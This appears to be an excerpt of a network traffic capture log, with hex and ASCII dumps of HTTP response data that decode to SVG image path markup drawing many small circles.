                                                                                                                                                                                                                                                  Data Ascii: class="cls-4" d="M875.65,209.87a1.69,1.69,0,0,1,.76-2.2,2.49,2.49,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M875.88,216.7a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3205INData Raw: 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 36 2e 30 35 2c 31 35 36 2e 31 39 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M846.05,156.19a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"/><path class="cls-4" d="
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3221INData Raw: 2c 32 38 36 2e 36 33 61 31 2e 36 38 2c 31 2e 36 38 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 38 36 2c 32 39 33 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32
                                                                                                                                                                                                                                                  Data Ascii: ,286.63a1.68,1.68,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.92,2.37,2.37,0,0,1-.5,2.85,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"/><path class="cls-4" d="M829.86,293.45a1.7,1.7,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3237INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2c 32 33 32 2e 39 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 30 2e 32 36 2c 32 33 39 2e 37 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1-.16-2.81"/><path class="cls-4" d="M800,232.94a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"/><path class="cls-4" d="M800.26,239.77a1.7,1.7,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.9
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3253INData Raw: 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 35 2c 32 32 39 2e 32 35 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 30 34 2e 37 33 2c 32 32 31 2e 35 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39
                                                                                                                                                                                                                                                  Data Ascii: 37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M505,229.25a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"/><path class="cls-7" d="M504.73,221.53a1.92,1.92,0,0,1-.87,2.49,2.79,2.79
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3269INData Raw: 3d 22 4d 35 32 33 2e 38 31 2c 38 39 2e 35 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 33 2e 35 35 2c 38 31 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ="M523.81,89.56a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M523.55,81.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3285INData Raw: 2e 36 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 35 37 2e 35 32 2c 31 35 37 2e 39 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: .66a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M557.52,157.94a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3301INData Raw: 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 31 2e 34 39 2c 32 33 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61
                                                                                                                                                                                                                                                  Data Ascii: 9,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"/><path class="cls-7" d="M591.49,234a1.92,1.92,0,0,1-.87,2.49,2.78,2.78,0,0,1-3.71-1.05,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><pa
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3317INData Raw: 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 33 31 2c 39 34 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 31 30 2e 30 35 2c 38 36 2e 36 34
                                                                                                                                                                                                                                                  Data Ascii: 1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.31,94.36a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1,2.67,2.67,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M610.05,86.64
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3333INData Raw: 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2e 32 38 2c 31 37 30 2e 34 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 34 34 2c 31 36 32 2e 37 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c
                                                                                                                                                                                                                                                  Data Ascii: 6,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644.28,170.46a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M644,162.74a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3349INData Raw: 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2e 32 35 2c 32 34 36 2e 35 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 37 38 2c 32 33 38 2e 38 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: "/><path class="cls-7" d="M678.25,246.56a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M678,238.84a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1.05,2.66,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3365INData Raw: 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 39 36 2e 38 31 2c 39 39 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: a1.92,1.92,0,0,1-.87,2.49,2.8,2.8,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M696.81,99.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3381INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3397INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                  Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3413INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3429INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                  Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3445INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                  Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3461INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
